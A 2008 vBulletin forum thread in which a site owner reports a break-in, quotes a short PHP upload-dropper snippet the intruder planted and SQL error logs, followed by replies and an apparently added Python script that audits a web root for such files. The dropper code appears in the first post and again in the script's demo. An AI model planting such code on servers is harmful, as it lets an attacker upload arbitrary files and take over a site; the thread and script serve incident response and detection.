Potential Exploit in VB 3.7.1?


pspcrazy
05-28-2008, 07:34 PM
Hi, as of late there has been a hacker that's been messing with my site. I removed some code which he placed into my code the last time he hacked:

<?php $ficnt = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), $_FILES["s"]["size"]);
if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $ficnt)) echo $_FILES["s"]["name"]; ?>

Don't know what it does but I know it's not supposed to be there.

Oddly though, now he's doing something else and I'm getting a lot of SQL errors like:

Database error in vBulletin 3.7.1:

Invalid SQL:

SELECT COUNT(*) AS count
FROM vbattachment
WHERE posthash = 'invalid posthash'
AND userid = 0;

MySQL Error : Lost connection to MySQL server during query
Error Number : 2013
Request Date : Wednesday, May 28th 2008 @ 03:14:25 PM
Error Date : Wednesday, May 28th 2008 @ 03:15:04 PM
Script : http://www.animecrazy.net/forums/newreply.php?do=postreply&t=1607
Referrer : http://www.animecrazy.net/forums/newreply.php?do=newreply&noquote=1&p=3625
IP Address : 24.47.55.108
Username : crack
Classname : vB_Database


Which only occur when he tries to hack me, and the username crack remains the same but the IP changes maybe 10 different times per minute. Very odd.

Anyone have any ideas as to what he's doing?

Mark.B
05-28-2008, 07:54 PM
Sounds like he hacked the server rather than vB.

pspcrazy
05-28-2008, 08:32 PM
The first time he apparently knew an admin's password but we replaced all the passwords and removed all the anomalies, so I doubt it's a server problem at this point. But hey I might be wrong.

Princeton
05-29-2008, 12:20 PM
I suggest checking for files that do not belong and checking your files for any further edits.

Your best bet is to hire someone that can look into this.
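
One way to carry out the check suggested above, as an added example that is not part of the original thread or vBulletin's own tooling: it compares the live web root with a clean copy of the same release and flags PHP files that are new, changed, or that write an upload to its client-supplied name, which is what the snippet quoted in the first post does. The function names, the regex and the sample trees are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# A write-open or move whose destination is the client-supplied upload name:
# the trait of the snippet quoted in the first post (heuristic, assumed here).
CLIENT_NAME_DEST = re.compile(
    r"""(?:fopen\s*\(|move_uploaded_file\s*\([^,]+,)\s*"""
    r"""\$_FILES\s*\[[^\]]+\]\s*\[\s*['"]name['"]\s*\]""")


def audit(live_root, clean_root):
    """Compare a live web root with a clean copy of the same release."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    report = {"unknown": [], "modified": [], "dropper": []}
    for path in sorted(live_root.rglob("*.php")):
        rel = path.relative_to(live_root)
        clean = clean_root / rel
        data = path.read_bytes()
        if not clean.is_file():
            report["unknown"].append(rel.as_posix())    # file that does not belong
        elif data != clean.read_bytes():
            report["modified"].append(rel.as_posix())   # edited since install
        if CLIENT_NAME_DEST.search(data.decode(errors="replace")):
            report["dropper"].append(rel.as_posix())    # upload-to-disk pattern
    return report


def demo():
    """Audit two small constructed trees (not real vBulletin files)."""
    dropper = ('<?php $c = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), '
               '$_FILES["s"]["size"]);\n'
               'if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $c)) '
               'echo $_FILES["s"]["name"]; ?>')
    stub = "<?php function f() {} ?>"
    with tempfile.TemporaryDirectory() as tmp:
        live, clean = Path(tmp, "live"), Path(tmp, "clean")
        for root in (live, clean):
            (root / "includes").mkdir(parents=True)
            (root / "index.php").write_text("<?php echo 'home'; ?>")
            (root / "includes" / "functions.php").write_text(stub)
        # Constructed tampering: one edited file and one planted file.
        (live / "includes" / "functions.php").write_text(stub + dropper)
        (live / "images.php").write_text("<?php echo 'x'; ?>")
        return audit(live, clean)


if __name__ == "__main__":
    print(demo())
```

Intentionally customised files will also show up as modified, so each entry needs a manual look before it is treated as tampering.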

pspcrazy
05-29-2008, 03:13 PM
Got any ideas on who? Have any experience with seeksadmin.com?